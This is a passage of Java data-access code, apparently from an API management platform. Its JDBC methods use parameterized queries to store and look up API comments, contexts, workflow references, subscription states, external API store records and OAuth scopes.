APIMgtDBUtil.getConnection(); smt = connection.prepareStatement(getConsumerKeySql); smt.setString(1, APIUtil.encryptToken(accessToken)); rs = smt.executeQuery(); while (rs.next()) { consumerKey = rs.getString(1); } } catch (SQLException e) { handleException("Error while getting authorized domians.", e); } catch (CryptoException e) { handleException("Error while getting authorized domians.", e); } finally { APIMgtDBUtil.closeAllConnections(smt, connection, rs); } return consumerKey; } /** * Adds a comment for an API * * @param identifier API Identifier * @param commentText Commented Text * @param user User who did the comment * @return Comment ID */ public int addComment(APIIdentifier identifier, String commentText, String user) throws APIManagementException { Connection connection = null; ResultSet resultSet = null; ResultSet insertSet = null; PreparedStatement getPrepStmt = null; PreparedStatement insertPrepStmt = null; int commentId = -1; int apiId = -1; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); String getApiQuery = SQLConstants.GET_API_ID_SQL; getPrepStmt = connection.prepareStatement(getApiQuery); getPrepStmt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); getPrepStmt.setString(2, identifier.getApiName()); getPrepStmt.setString(3, identifier.getVersion()); resultSet = getPrepStmt.executeQuery(); if (resultSet.next()) { apiId = resultSet.getInt("API_ID"); } if (apiId == -1) { String msg = "Unable to get the API ID for: " + identifier; log.error(msg); throw new APIManagementException(msg); } /*This query to update the AM_API_COMMENTS table */ String addCommentQuery = SQLConstants.ADD_COMMENT_SQL; /*Adding data to the AM_API_COMMENTS table*/ String dbProductName = connection.getMetaData().getDatabaseProductName(); insertPrepStmt = connection.prepareStatement(addCommentQuery, new String[]{DBUtils.getConvertedAutoGeneratedColumnName(dbProductName, "comment_id")}); insertPrepStmt.setString(1, commentText); insertPrepStmt.setString(2, user); insertPrepStmt.setTimestamp(3, new Timestamp(System.currentTimeMillis()), 
Calendar.getInstance()); insertPrepStmt.setInt(4, apiId); insertPrepStmt.executeUpdate(); insertSet = insertPrepStmt.getGeneratedKeys(); while (insertSet.next()) { commentId = Integer.parseInt(insertSet.getString(1)); } connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add comment ", e1); } } handleException("Failed to add comment data, for " + identifier.getApiName() + '-' + identifier .getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(getPrepStmt, connection, resultSet); APIMgtDBUtil.closeAllConnections(insertPrepStmt, null, insertSet); } return commentId; } /** * Returns all the Comments on an API * * @param identifier API Identifier * @return Comment Array * @throws APIManagementException */ public Comment[] getComments(APIIdentifier identifier) throws APIManagementException { List<Comment> commentList = new ArrayList<Comment>(); Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String sqlQuery = SQLConstants.GET_COMMENTS_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); prepStmt.setString(2, identifier.getApiName()); prepStmt.setString(3, identifier.getVersion()); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { Comment comment = new Comment(); comment.setText(resultSet.getString("COMMENT_TEXT")); comment.setUser(resultSet.getString("COMMENTED_USER")); comment.setCreatedTime(new java.util.Date(resultSet.getTimestamp("DATE_COMMENTED").getTime())); commentList.add(comment); } } catch (SQLException e) { try { if (connection != null) { connection.rollback(); } } catch (SQLException e1) { log.error("Failed to retrieve comments ", e1); } handleException("Failed to retrieve comments for " + identifier.getApiName() + '-' + identifier .getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return commentList.toArray(new Comment[commentList.size()]); } public boolean isContextExist(String context) { Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String sql = SQLConstants.GET_API_CONTEXT_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sql); prepStmt.setString(1, context); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { if (resultSet.getString(1) != null) { return true; } } } catch (SQLException e) { log.error("Failed to retrieve the API Context ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } public String getAPIContext(APIIdentifier identifier) throws APIManagementException { Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String context = null; String sql = SQLConstants.GET_API_CONTEXT_BY_API_NAME_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sql); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); prepStmt.setString(2, identifier.getApiName()); prepStmt.setString(3, identifier.getVersion()); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { context = resultSet.getString(1); } } catch (SQLException e) { log.error("Failed to retrieve the API Context", e); handleException("Failed to retrieve the API Context for " + 
identifier.getProviderName() + '-' + identifier.getApiName() + '-' + identifier .getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return context; } public List<String> getAllAvailableContexts() { List<String> contexts = new ArrayList<String>(); Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String sql = SQLConstants.GET_ALL_CONTEXT_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sql); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { contexts.add(resultSet.getString("CONTEXT")); } } catch (SQLException e) { log.error("Failed to retrieve the API Context ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return contexts; } public void populateAppRegistrationWorkflowDTO(ApplicationRegistrationWorkflowDTO workflowDTO) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; Application application = null; Subscriber subscriber = null; String registrationEntry = SQLConstants.GET_APPLICATION_REGISTRATION_ENTRY_BY_SUBSCRIBER_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(registrationEntry); ps.setString(1, workflowDTO.getExternalWorkflowReference()); rs = ps.executeQuery(); while (rs.next()) { subscriber = new Subscriber(rs.getString("USER_ID")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); application = new Application(rs.getString("NAME"), subscriber); application.setId(rs.getInt("APPLICATION_ID")); application.setApplicationWorkFlowStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setDescription(rs.getString("DESCRIPTION")); application.setTier(rs.getString("APPLICATION_TIER")); workflowDTO.setApplication(application); workflowDTO.setKeyType(rs.getString("TOKEN_TYPE")); workflowDTO.setUserName(subscriber.getName()); workflowDTO.setDomainList(rs.getString("ALLOWED_DOMAINS")); workflowDTO.setValidityTime(rs.getLong("VALIDITY_PERIOD")); OAuthAppRequest request = ApplicationUtils.createOauthAppRequest(application.getName(), null, application.getCallbackUrl(), rs .getString("TOKEN_SCOPE"), rs.getString("INPUTS"), application.getTokenType()); workflowDTO.setAppInfoDTO(request); } } catch (SQLException e) { handleException("Error occurred while retrieving an " + "Application Registration Entry for Workflow : " + workflowDTO .getExternalWorkflowReference(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } } public int getApplicationIdForAppRegistration(String workflowReference) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; int appId = -1; String registrationEntry = SQLConstants.GET_APPLICATION_REGISTRATION_ID_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(registrationEntry); ps.setString(1, workflowReference); rs = ps.executeQuery(); while (rs.next()) { appId = rs.getInt("APP_ID"); } } catch (SQLException e) { handleException("Error occurred while retrieving an " + "Application Registration Entry for Workflow : " + workflowReference, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return appId; } /** * Fetches WorkflowReference when given Application Name and UserId. 
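     * <p>
     * The lookup runs GET_WORKFLOW_ENTRY_SQL with the application name and user id and returns the WF_REF
     * column of the matching row, or {@code null} when no workflow entry exists. Illustrative call (the
     * {@code apiMgtDAO} variable and the argument values are assumptions):
     * <pre>{@code
     * String wfRef = apiMgtDAO.getWorkflowReference("DefaultApplication", "admin");
     * }</pre>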
* * @param applicationName * @param userId * @return WorkflowReference * @throws APIManagementException */ public String getWorkflowReference(String applicationName, String userId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String workflowReference = null; String sqlQuery = SQLConstants.GET_WORKFLOW_ENTRY_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, applicationName); ps.setString(2, userId); rs = ps.executeQuery(); while (rs.next()) { workflowReference = rs.getString("WF_REF"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Application : " + applicationName + " created by " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowReference; } /** * Fetches WorkflowReference when given Application Name and UserId. * * @param applicationId * @param userId * @return WorkflowReference * @throws APIManagementException */ public String getWorkflowReferenceByApplicationId(int applicationId, String userId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String workflowReference = null; String sqlQuery = SQLConstants.GET_WORKFLOW_ENTRY_BY_APP_ID_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setString(2, userId); rs = ps.executeQuery(); while (rs.next()) { workflowReference = rs.getString("WF_REF"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Application : " + applicationId + " created by " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowReference; } /** * Retries the WorkflowExternalReference for a application. 
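     * <p>
     * Matches the workflow entry of type WF_TYPE_AM_APPLICATION_CREATION whose internal reference equals the
     * given application id (compared as a string) and returns its WF_EXTERNAL_REFERENCE, or {@code null} if no
     * such entry exists.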
     *
     * @param appID ID of the application
     * @return External workflow reference for the application identified
     * @throws APIManagementException
     */
    public String getExternalWorkflowReferenceByApplicationID(int appID) throws APIManagementException {
        String workflowExtRef = null;
        Connection conn = null;
        PreparedStatement ps = null;
        ResultSet rs = null;
        String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_REFERENCE_SQL;
        try {
            conn = APIMgtDBUtil.getConnection();
            ps = conn.prepareStatement(sqlQuery);
            ps.setString(1, WorkflowConstants.WF_TYPE_AM_APPLICATION_CREATION);
            ps.setString(2, String.valueOf(appID));
            rs = ps.executeQuery();
            // returns only one row
            while (rs.next()) {
                workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE");
            }
        } catch (SQLException e) {
            handleException("Error occurred while getting workflow entry for " +
                    "Application ID : " + appID, e);
        } finally {
            APIMgtDBUtil.closeAllConnections(ps, conn, rs);
        }
        return workflowExtRef;
    }

    /**
     * Remove workflow entry
     *
     * @param workflowReference
     * @param workflowType
     * @throws APIManagementException
     */
    public void removeWorkflowEntry(String workflowReference, String workflowType) throws APIManagementException {
        Connection connection = null;
        PreparedStatement prepStmt = null;
        String queryWorkflowDelete = SQLConstants.REMOVE_WORKFLOW_ENTRY_SQL;
        try {
            connection = APIMgtDBUtil.getConnection();
            connection.setAutoCommit(false);
            prepStmt = connection.prepareStatement(queryWorkflowDelete);
            prepStmt.setString(1, workflowType);
            prepStmt.setString(2, workflowReference);
            prepStmt.execute();
            connection.commit();
        } catch (SQLException e) {
            handleException("Error while deleting workflow entry " + workflowReference + " from the database", e);
        } finally {
            APIMgtDBUtil.closeAllConnections(prepStmt, connection, null);
        }
    }

    /**
     * Retrieves the WorkflowExternalReference for a subscription.
     *
     * @param identifier APIIdentifier to find the subscribed api
     * @param appID ID of the application which has the subscription
     * @return External workflow reference for the subscription identified
     * @throws APIManagementException
     */
    public String getExternalWorkflowReferenceForSubscription(APIIdentifier identifier, int appID)
            throws APIManagementException {
        String workflowExtRef = null;
        Connection conn = null;
        PreparedStatement ps = null;
        ResultSet rs = null;
        int apiID;
        int subscriptionID = -1;
        String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_REFERENCE_FOR_SUBSCRIPTION_SQL;
        String postgreSQL = SQLConstants.GET_EXTERNAL_WORKFLOW_REFERENCE_FOR_SUBSCRIPTION_POSTGRE_SQL;
        try {
            // Obtain the connection before resolving the API ID; getAPIID needs a live connection.
            conn = APIMgtDBUtil.getConnection();
            apiID = getAPIID(identifier, conn);
            if (conn.getMetaData().getDriverName().contains("PostgreSQL")) {
                sqlQuery = postgreSQL;
            }
            ps = conn.prepareStatement(sqlQuery);
            ps.setInt(1, apiID);
            ps.setInt(2, appID);
            ps.setString(3, WorkflowConstants.WF_TYPE_AM_SUBSCRIPTION_CREATION);
            rs = ps.executeQuery();
            // returns only one row
            while (rs.next()) {
                workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE");
            }
        } catch (SQLException e) {
            handleException("Error occurred while getting workflow entry for " +
                    "Subscription : " + subscriptionID, e);
        } finally {
            APIMgtDBUtil.closeAllConnections(ps, conn, rs);
        }
        return workflowExtRef;
    }

    /**
     * Retrieves the WorkflowExternalReference for a subscription.
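     * <p>
     * Illustrative usage with a hypothetical subscription id, assuming {@code dao} is an instance of this class:
     * <pre>
     * String extRef = dao.getExternalWorkflowReferenceForSubscription(17);
     * </pre>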
* * @param subscriptionId ID of the subscription * @return External workflow reference for the subscription <code>subscriptionId</code> * @throws APIManagementException */ public String getExternalWorkflowReferenceForSubscription(int subscriptionId) throws APIManagementException { String workflowExtRef = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_FOR_SUBSCRIPTION_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); // setting subscriptionId as string to prevent error when db finds string type IDs for // ApplicationRegistration workflows ps.setString(1, String.valueOf(subscriptionId)); ps.setString(2, WorkflowConstants.WF_TYPE_AM_SUBSCRIPTION_CREATION); rs = ps.executeQuery(); // returns only one row while (rs.next()) { workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Subscription : " + subscriptionId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowExtRef; } /** * Retries the WorkflowExternalReference for an user signup by DOMAIN/username. * * @param usernameWithDomain username of the signed up user inthe format of DOMAIN/username * @return External workflow reference for the signup workflow entry * @throws APIManagementException */ public String getExternalWorkflowReferenceForUserSignup(String usernameWithDomain) throws APIManagementException { String workflowExtRef = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_FOR_SIGNUP_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, usernameWithDomain); ps.setString(2, WorkflowConstants.WF_TYPE_AM_USER_SIGNUP); rs = ps.executeQuery(); // returns only one row while (rs.next()) { workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "User signup : " + usernameWithDomain, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowExtRef; } /** * Retrieves IDs of pending subscriptions for a given application * * @param applicationId application id of the application * @return Set containing subscription id list * @throws APIManagementException */ public Set<Integer> getPendingSubscriptionsByApplicationId(int applicationId) throws APIManagementException { Set<Integer> pendingSubscriptions = new HashSet<Integer>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_PAGINATED_SUBSCRIPTIONS_BY_APPLICATION_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setString(2, APIConstants.SubscriptionStatus.ON_HOLD); rs = ps.executeQuery(); while (rs.next()) { pendingSubscriptions.add(rs.getInt("SUBSCRIPTION_ID")); } } catch (SQLException e) { handleException("Error occurred while getting subscription entries for " + "Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return pendingSubscriptions; } /** * Retrieves registration workflow reference for applicationId and key type * * @param applicationId id of the application with registration * @param keyType key type of the registration * @return workflow reference of the registration * @throws APIManagementException */ public String 
getRegistrationWFReference(int applicationId, String keyType) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String reference = null; String sqlQuery = SQLConstants.GET_REGISTRATION_WORKFLOW_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setString(2, keyType); rs = ps.executeQuery(); // returns only one row while (rs.next()) { reference = rs.getString("WF_REF"); } } catch (SQLException e) { handleException("Error occurred while getting registration entry for " + "Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return reference; } /** * Retrives subscription status for APIIdentifier and applicationId * * @param identifier api identifier subscribed * @param applicationId application with subscription * @return subscription status * @throws APIManagementException */ public String getSubscriptionStatus(APIIdentifier identifier, int applicationId) throws APIManagementException { String status = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_STATUS_SQL; try { conn = APIMgtDBUtil.getConnection(); int apiId = getAPIID(identifier, conn); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); ps.setInt(2, applicationId); rs = ps.executeQuery(); // returns only one row while (rs.next()) { status = rs.getString("SUB_STATUS"); } } catch (SQLException e) { handleException("Error occurred while getting subscription entry for " + "Application : " + applicationId + ", API: " + identifier, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return status; } /** * Retrieve subscription create state for APIIdentifier and applicationID * * @param identifier - api identifier which is subscribed * @param applicationId - application used to subscribed * @param connection * @return subscription create status * @throws APIManagementException */ public String getSubscriptionCreaeteStatus(APIIdentifier identifier, int applicationId, Connection connection) throws APIManagementException { String status = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_CREATION_STATUS_SQL; try { int apiId = getAPIID(identifier, connection); ps = connection.prepareStatement(sqlQuery); ps.setInt(1, apiId); ps.setInt(2, applicationId); rs = ps.executeQuery(); // returns only one row while (rs.next()) { status = rs.getString("SUBS_CREATE_STATE"); } } catch (SQLException e) { handleException("Error occurred while getting subscription entry for " + "Application : " + applicationId + ", API: " + identifier, e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return status; } private class SubscriptionInfo { private int subscriptionId; private String tierId; private int applicationId; private String accessToken; private String tokenType; } /** * Identify whether the loggedin user used his ordinal username or email * * @param userId * @return */ private boolean isUserLoggedInEmail(String userId) { return userId.contains("@"); } /** * Identify whether the loggedin user used his Primary Login name or Secondary login name * * @param userId * @return */ private boolean isSecondaryLogin(String userId) { Map<String, Map<String, String>> loginConfiguration = ServiceReferenceHolder.getInstance() .getAPIManagerConfigurationService().getAPIManagerConfiguration().getLoginConfiguration(); if 
(loginConfiguration.get(APIConstants.EMAIL_LOGIN) != null) { Map<String, String> emailConf = loginConfiguration.get(APIConstants.EMAIL_LOGIN); if ("true".equalsIgnoreCase(emailConf.get(APIConstants.PRIMARY_LOGIN))) { return !isUserLoggedInEmail(userId); } if ("false".equalsIgnoreCase(emailConf.get(APIConstants.PRIMARY_LOGIN))) { return isUserLoggedInEmail(userId); } } if (loginConfiguration.get(APIConstants.USERID_LOGIN) != null) { Map<String, String> userIdConf = loginConfiguration.get(APIConstants.USERID_LOGIN); if ("true".equalsIgnoreCase(userIdConf.get(APIConstants.PRIMARY_LOGIN))) { return isUserLoggedInEmail(userId); } if ("false".equalsIgnoreCase(userIdConf.get(APIConstants.PRIMARY_LOGIN))) { return !isUserLoggedInEmail(userId); } } return false; } /** * Get the primaryLogin name using secondary login name. Primary secondary * Configuration is provided in the identitiy.xml. In the userstore, it is * users responsibility TO MAINTAIN THE SECONDARY LOGIN NAME AS UNIQUE for * each and every users. If it is not unique, we will pick the very first * entry from the userlist. * * @param login * @return * @throws APIManagementException */ private String getPrimaryLoginFromSecondary(String login) throws APIManagementException { Map<String, Map<String, String>> loginConfiguration = ServiceReferenceHolder.getInstance() .getAPIManagerConfigurationService().getAPIManagerConfiguration().getLoginConfiguration(); String claimURI, username = null; if (isUserLoggedInEmail(login)) { Map<String, String> emailConf = loginConfiguration.get(APIConstants.EMAIL_LOGIN); claimURI = emailConf.get(APIConstants.CLAIM_URI); } else { Map<String, String> userIdConf = loginConfiguration.get(APIConstants.USERID_LOGIN); claimURI = userIdConf.get(APIConstants.CLAIM_URI); } try { RemoteUserManagerClient rmUserClient = new RemoteUserManagerClient(login); String[] user = rmUserClient.getUserList(claimURI, login); if (user.length > 0) { username = user[0]; } } catch (Exception e) { handleException("Error while retrieving the primaryLogin name using secondary loginName : " + login, e); } return username; } /** * identify the login username is primary or secondary * * @param userID * @return * @throws APIManagementException */ private String getLoginUserName(String userID) throws APIManagementException { String primaryLogin = userID; if (isSecondaryLogin(userID)) { primaryLogin = getPrimaryLoginFromSecondary(userID); } return primaryLogin; } /** * Store external APIStore details to which APIs successfully published * * @param apiId APIIdentifier * @param apiStoreSet APIStores set * @return added/failed * @throws APIManagementException */ public boolean addExternalAPIStoresDetails(APIIdentifier apiId, Set<APIStore> apiStoreSet) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; boolean state = false; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query to add external APIStores to database table String sqlQuery = SQLConstants.ADD_EXTERNAL_API_STORE_SQL; //Get API Id int apiIdentifier; apiIdentifier = getAPIID(apiId, conn); if (apiIdentifier == -1) { String msg = "Could not load API record for: " + apiId.getApiName(); log.error(msg); } ps = conn.prepareStatement(sqlQuery); for (Object storeObject : apiStoreSet) { APIStore store = (APIStore) storeObject; ps.setInt(1, apiIdentifier); ps.setString(2, store.getName()); ps.setString(3, store.getDisplayName()); ps.setString(4, store.getEndpoint()); ps.setString(5, store.getType()); ps.addBatch(); } ps.executeBatch(); 
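            // All external store rows above were queued into a single JDBC batch; the commit below makes them visible atomically.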
conn.commit(); state = true; } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback storing external apistore details ", e1); } } log.error("Failed to store external apistore details", e); state = false; } catch (APIManagementException e) { log.error("Failed to store external apistore details", e); state = false; } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } return state; } /** * Delete the records of external APIStore details. * * @param apiId APIIdentifier * @param apiStoreSet APIStores set * @return added/failed * @throws APIManagementException */ public boolean deleteExternalAPIStoresDetails(APIIdentifier apiId, Set<APIStore> apiStoreSet) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; boolean state = false; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String sqlQuery = SQLConstants.REMOVE_EXTERNAL_API_STORE_SQL; //Get API Id int apiIdentifier; apiIdentifier = getAPIID(apiId, conn); if (apiIdentifier == -1) { String msg = "Could not load API record for: " + apiId.getApiName(); log.error(msg); } ps = conn.prepareStatement(sqlQuery); for (Object storeObject : apiStoreSet) { APIStore store = (APIStore) storeObject; ps.setInt(1, apiIdentifier); ps.setString(2, store.getName()); ps.setString(3, store.getType()); ps.addBatch(); } ps.executeBatch(); conn.commit(); state = true; } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback deleting external apistore details ", e1); } } log.error("Failed to delete external apistore details", e); state = false; } catch (APIManagementException e) { log.error("Failed to delete external apistore details", e); state = false; } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } return state; } public void updateExternalAPIStoresDetails(APIIdentifier apiId, Set<APIStore> apiStoreSet) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); updateExternalAPIStoresDetails(apiId, apiStoreSet, conn); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback updating external apistore details ", e1); } } log.error("Failed to update external apistore details", e); } catch (APIManagementException e) { log.error("Failed to updating external apistore details", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } /** * Updateexternal APIStores details to which APIs published * * @param apiIdentifier API Identifier * @throws APIManagementException if failed to add Application */ public void updateExternalAPIStoresDetails(APIIdentifier apiIdentifier, Set<APIStore> apiStoreSet, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; try { conn.setAutoCommit(false); //This query to add external APIStores to database table String sqlQuery = SQLConstants.UPDATE_EXTERNAL_API_STORE_SQL; ps = conn.prepareStatement(sqlQuery); //Get API Id int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); } for (Object storeObject : apiStoreSet) { APIStore store = (APIStore) storeObject; ps.setString(1, store.getEndpoint()); ps.setString(2, store.getType()); ps.setInt(3, apiId); ps.setString(4, store.getName()); ps.addBatch(); } ps.executeBatch(); 
ps.clearBatch(); conn.commit(); } catch (SQLException e) { log.error("Error while updating External APIStore details to the database for API : ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } /** * Return external APIStore details on successfully APIs published * * @param apiId APIIdentifier * @return Set of APIStore * @throws APIManagementException */ public Set<APIStore> getExternalAPIStoresDetails(APIIdentifier apiId) throws APIManagementException { Connection conn = null; Set<APIStore> storesSet = new HashSet<APIStore>(); try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); storesSet = getExternalAPIStoresDetails(apiId, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting external apistore details ", e1); } } log.error("Failed to get external apistore details", e); } catch (APIManagementException e) { log.error("Failed to get external apistore details", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return storesSet; } /** * Get external APIStores details which are stored in database * * @param apiIdentifier API Identifier * @throws APIManagementException if failed to get external APIStores */ public Set<APIStore> getExternalAPIStoresDetails(APIIdentifier apiIdentifier, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; ResultSet rs = null; Set<APIStore> storesSet = new HashSet<APIStore>(); try { conn = APIMgtDBUtil.getConnection(); //This query to add external APIStores to database table String sqlQuery = SQLConstants.GET_EXTERNAL_API_STORE_DETAILS_SQL; ps = conn.prepareStatement(sqlQuery); int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } ps.setInt(1, apiId); rs = ps.executeQuery(); while (rs.next()) { APIStore store = new APIStore(); store.setName(rs.getString("STORE_ID")); store.setDisplayName(rs.getString("STORE_DISPLAY_NAME")); store.setEndpoint(rs.getString("STORE_ENDPOINT")); store.setType(rs.getString("STORE_TYPE")); store.setPublished(true); storesSet.add(store); } } catch (SQLException e) { handleException("Error while getting External APIStore details from the database for the API : " + apiIdentifier.getApiName() + '-' + apiIdentifier.getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return storesSet; } public void addScopes(Set<?> objects, APIIdentifier apiIdentifier, int apiID, int tenantID) throws APIManagementException { Connection conn = null; PreparedStatement ps = null, ps2 = null, ps3 = null; ResultSet rs = null; String scopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; String scopeRoleEntry = SQLConstants.ADD_SCOPE_ROLE_SQL; String scopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; Boolean scopeSharingEnabled = false; if (!StringUtils.isEmpty(System.getProperty(APIConstants.ENABLE_API_SCOPES_SHARING))) { scopeSharingEnabled = Boolean.parseBoolean(System.getProperty(APIConstants.ENABLE_API_SCOPES_SHARING)); } try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String scopeId = "SCOPE_ID"; if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { scopeId = "scope_id"; } if (objects != null) { for (Object object : objects) { ps = conn.prepareStatement(scopeEntry, new String[]{scopeId}); ps2 = conn.prepareStatement(scopeLink); ps3 = 
conn.prepareStatement(scopeRoleEntry); if (object instanceof URITemplate) { URITemplate uriTemplate = (URITemplate) object; if (uriTemplate.getScope() == null) { continue; } if (!scopeSharingEnabled && isScopeKeyAssigned(apiIdentifier, uriTemplate.getScope().getKey(), tenantID)) { throw new APIManagementException("Scope '" + uriTemplate.getScope().getKey() + "' " + "is already used by another API."); } ps.setString(1, uriTemplate.getScope().getKey()); ps.setString(2, uriTemplate.getScope().getName()); ps.setString(3, uriTemplate.getScope().getDescription()); ps.setInt(4, tenantID); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { uriTemplate.getScope().setId(rs.getInt(1)); } String roles = uriTemplate.getScope().getRoles(); //Adding scope bindings List<String> roleList = Lists.newArrayList(Splitter.on(",").trimResults().split(roles)); for (String role : roleList) { ps3.setInt(1, uriTemplate.getScope().getId()); ps3.setString(2, role); ps3.addBatch(); } ps3.executeBatch(); ps2.setInt(1, apiID); ps2.setInt(2, uriTemplate.getScope().getId()); ps2.execute(); conn.commit(); } else if (object instanceof Scope) { Scope scope = (Scope) object; if (!scopeSharingEnabled && isScopeKeyAssigned(apiIdentifier, scope.getKey(), tenantID)) { throw new APIManagementException("Scope '" + scope.getKey() + "' is already used " + "by another API."); } ps.setString(1, scope.getKey()); ps.setString(2, scope.getName()); ps.setString(3, scope.getDescription()); ps.setInt(4, tenantID); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { scope.setId(rs.getInt(1)); } String roles = scope.getRoles(); //Adding scope bindings List<String> roleList = Lists.newArrayList(Splitter.on(",").trimResults().split(roles)); for (String role : roleList) { ps3.setInt(1, scope.getId()); ps3.setString(2, role); ps3.addBatch(); } ps3.executeBatch(); ps2.setInt(1, apiID); ps2.setInt(2, scope.getId()); ps2.execute(); conn.commit(); } } } } catch (SQLException e) { try { if (conn != null) { conn.rollback(); } } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on Scopes 